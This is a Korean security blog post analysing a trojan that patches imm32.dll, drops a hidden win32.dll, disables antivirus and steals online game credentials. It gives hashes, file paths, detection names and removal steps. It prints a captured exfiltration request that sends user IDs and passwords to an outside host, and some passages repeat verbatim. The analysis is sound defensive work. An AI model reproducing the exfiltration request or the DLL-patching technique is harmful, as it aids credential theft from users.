반응형
최근 주말을 이용한 악성코드 유포를 통해 온라인 게임 계정 정보를 탈취하는 문제는 Windows 취약점, 웹 브라우저 취약점, Adobe Flash Player 취약점 등을 이용하여 사용자가 변조된 인터넷 사이트에 접속할 경우 자동으로 감염되는 방법이 가장 활발합니다.
또한 네이트온(NateOn) 메신저를 이용하여 특정 URL 링크를 무작위로 전달하여 해당 사이트 접속시 보안 패치가 제대로 이루어지지 않은 사용자 PC가 자동으로 감염되며 이런 과정에서 사용자는 감염 여부를 눈치채기 매우 어렵습니다.
최근에는 Windows 시스템 파일을 변경하는 악성코드 유포가 더욱 다양성을 가지고 있는 것으로 알려져 있으며, 기존부터 꾸준하게 변경되던 imm32.dll 파일의 경우 초기 한글이 제대로 구현되지 않는 문제도 해결한 상태로 보입니다.
지난 주말에는 국내 포털 사이트 파란(Paran) 메인 페이지에 접속할 경우 악성 스크립트가 유포되었다는 소문이 있으며, 해당 유포 방식은 특정 취약점을 이용한 악성 스크립트 삽입을 통해 최종적으로 온라인 게임 계정을 탈취하고 있는 것으로 추정됩니다.
이번 시간에는 당시 유포되어 설치가 이루어진 것으로 추정되는 샘플(MD5 : 199416f5e63b072cbbb581c03611efca)을 이용하여 간단하게 살펴보도록 하겠습니다.
참고로 해당 파일에 대하여 avast! 보안 제품에서는 Win32:Patched-PX (VirusTotal : 24/42) 진단명으로 진단되고 있으므로 참고하시기 바랍니다.
또한 네이트온(NateOn) 메신저를 이용하여 특정 URL 링크를 무작위로 전달하여 해당 사이트 접속시 보안 패치가 제대로 이루어지지 않은 사용자 PC가 자동으로 감염되며 이런 과정에서 사용자는 감염 여부를 눈치채기 매우 어렵습니다.
최근에는 Windows 시스템 파일을 변경하는 악성코드 유포가 더욱 다양성을 가지고 있는 것으로 알려져 있으며, 기존부터 꾸준하게 변경되던 imm32.dll 파일의 경우 초기 한글이 제대로 구현되지 않는 문제도 해결한 상태로 보입니다.
지난 주말에는 국내 포털 사이트 파란(Paran) 메인 페이지에 접속할 경우 악성 스크립트가 유포되었다는 소문이 있으며, 해당 유포 방식은 특정 취약점을 이용한 악성 스크립트 삽입을 통해 최종적으로 온라인 게임 계정을 탈취하고 있는 것으로 추정됩니다.
이번 시간에는 당시 유포되어 설치가 이루어진 것으로 추정되는 샘플(MD5 : 199416f5e63b072cbbb581c03611efca)을 이용하여 간단하게 살펴보도록 하겠습니다.
참고로 해당 파일에 대하여 avast! 보안 제품에서는 Win32:Patched-PX (VirusTotal : 24/42) 진단명으로 진단되고 있으므로 참고하시기 바랍니다.
[생성 파일 / 진단 정보]
C:\WINDOWS\system32\imm32.dll (MD5 : 558c8010a3e769f6844dfc4a503c3e21) :: 111,104 Bytes
- ALYac 2.0 : Trojan.Patched.Starter.B
C:\WINDOWS\system32\imm32.dllVP3Vdx.tmp :: imm32.dll 백업 파일(정상 파일) - 110,080 Bytes
※ 유형 : C:\WINDOWS\system32\imm32.dll(Random 6자리 숫자+영문).tmp
C:\WINDOWS\system32\win32.dll (MD5 : a12cc7782bf7f5329f94f8433629f613)
- BitDefender : Gen:Trojan.Heur.LP.fu8@aqKflWmi
C:\WINDOWS\system32\imm32.dll (MD5 : 558c8010a3e769f6844dfc4a503c3e21) :: 111,104 Bytes
- ALYac 2.0 : Trojan.Patched.Starter.B
C:\WINDOWS\system32\imm32.dllVP3Vdx.tmp :: imm32.dll 백업 파일(정상 파일) - 110,080 Bytes
※ 유형 : C:\WINDOWS\system32\imm32.dll(Random 6자리 숫자+영문).tmp
C:\WINDOWS\system32\win32.dll (MD5 : a12cc7782bf7f5329f94f8433629f613)
- BitDefender : Gen:Trojan.Heur.LP.fu8@aqKflWmi
감염된 PC에서는 imm32.dll 시스템 파일을 변경하여 imm32.dll(Random 6자리 숫자+영문).tmp 파일 유형으로 백업을 하고, win32.dll 파일을 시스템(S), 숨김(H) 속성으로 등록하여 동작하도록 구성되어 있습니다.
대략적인 도식으로 살펴보면 특정 인터넷 사이트에 접속할 경우 취약점이 존재하는 PC는 자동 감염이 이루어지며 이를 통해 imm32.dll / win32.dll 2개의 파일을 생성하여 온라임 게임 계정 탈취와 V3, 알약(ALYac) 보안 제품 기능을 무력화하도록 구성되어 있습니다.
핵심적인 기능을 하는 win32.dll 파일의 경우 Windows 탐색기 기본값으로는 보이지 않으며, 폴더 옵션에서 [보호된 운영 체제 파일 숨기기] 항목을 체크 해제하시고, [숨김 파일 및 폴더 - 숨김 파일, 폴더 및 드라이브 표시]으로 변경을 해야지 파일 존재 여부를 확인할 수 있습니다.
해당 악성코드에 감염된 PC는 아이온(Aion), 다크블러드(DarkBlood.exe), 한게임(HanGame), 넷마블(NetMarble), 리니지(Lineage), 피망(PMang), 메이플스토리(MapleStory) 등 다양한 온라인 게임에 로그인을 하는 과정에서 계정 정보가 외부로 유출이 이루어집니다.
[넷마블 게임 정보 유출 예시]
GET /nm/post.asp?Game=08¶=nate0515&ves=009&d00=NAIMA&d01=NAIMA&d10=(사용자 ID)&d11=(사용자 비밀번호)&d21=&d30=~(생략)~=&d90=1056 HTTP/1.1
User-Agent: IE6.0
Host: nate.natesite.info
GET /nm/post.asp?Game=08¶=nate0515&ves=009&d00=NAIMA&d01=NAIMA&d10=(사용자 ID)&d11=(사용자 비밀번호)&d21=&d30=~(생략)~=&d90=1056 HTTP/1.1
User-Agent: IE6.0
Host: nate.natesite.info
예시와 같이 홍콩(HongKong)에 등록된 서버로 게임 아이디(ID), 비밀번호 등의 정보가 유출이 이루어지고 있는 것을 확인할 수 있습니다.
또한 사용자 PC에 설치된 특정 보안 제품의 기능이 무력화되어 실시간 감시, 업데이트, 실행, 검사 등에 영향을 미치는 경우가 발생하므로 만약 자신이 사용하는 보안 제품이 비정상적인 동작을 할 경우에는 악성코드 감염으로 인한 문제일 확률이 높습니다.
win32.dll 파일은 그림과 같이 다양한 프로세스에 자신을 추가하여 삭제를 방해하고 있으며, 보안 제품을 통한 정밀 검사를 통해 치료를 하시기 바랍니다.
만약 수동으로 문제를 해결하셔야 할 경우에는 다음과 같은 방법으로 문제를 해결하시기 바랍니다.
만약 수동으로 문제를 해결하셔야 할 경우에는 다음과 같은 방법으로 문제를 해결하시기 바랍니다.
- 모든 프로그램을 종료하고, 폴더 옵션에서 시스템 파일, 숨김 폴더(파일)를 볼 수 있도록 변경합니다.
- imm32.dll / win32.dll 파일을 찾아 확장자 변경을 합니다. 예를 들어 imm32.dll- / win32.dll- 와 같이 파일을 변경합니다.
- 반드시 Windows 재부팅을 합니다.
- imm32.dll(Random 6자리 숫자+영문).tmp / imm32.dll- / win32.dll- 3개의 파일을 찾아서 수동으로 삭제를 합니다.
참고로 변경된 imm32.dll 시스템 파일의 확장자를 변경할 경우, 윈도우 파일 보호 기능으로 인하여 자동으로 imm32.dll 파일이 생성됩니다.
이같은 악성코드로부터 PC를 보호하기 위해서는 반드시 매월 정기적으로 제공되는 Microsoft 보안 업데이트와 Adobe Flash Player 보안 패치를 꾸준히 설치해야 합니다.
보안 패치가 정상적으로 이루어진 PC는 악의적인 인터넷 사이트 접속시 보안 제품의 진단 능력과 상관없이 자동으로 감염되는 일은 발생하지 않습니다.
728x90
반응형